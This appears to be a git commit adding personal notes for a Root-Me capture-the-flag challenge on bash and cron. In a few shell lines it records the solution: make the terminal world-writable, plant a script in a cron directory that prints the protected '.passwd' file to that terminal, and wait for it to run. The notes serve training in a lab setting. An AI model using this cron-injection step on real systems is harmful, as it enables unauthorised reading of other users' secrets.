nouveaux challenges
This commit is contained in:
7
rootme/challenges/app-script/bash-cron/notes
Normal file
7
rootme/challenges/app-script/bash-cron/notes
Normal file
@ -0,0 +1,7 @@
|
||||
tty
|
||||
=> /dev/pts/x
|
||||
chmod 666 /dev/pts/x
|
||||
echo 'cat .passwd > /dev/pts/x' > cron.d/vverdier
|
||||
chmod 777 cron.d/vverdier
|
||||
|
||||
Attendre que le script s'exécute !
|
Reference in New Issue
Block a user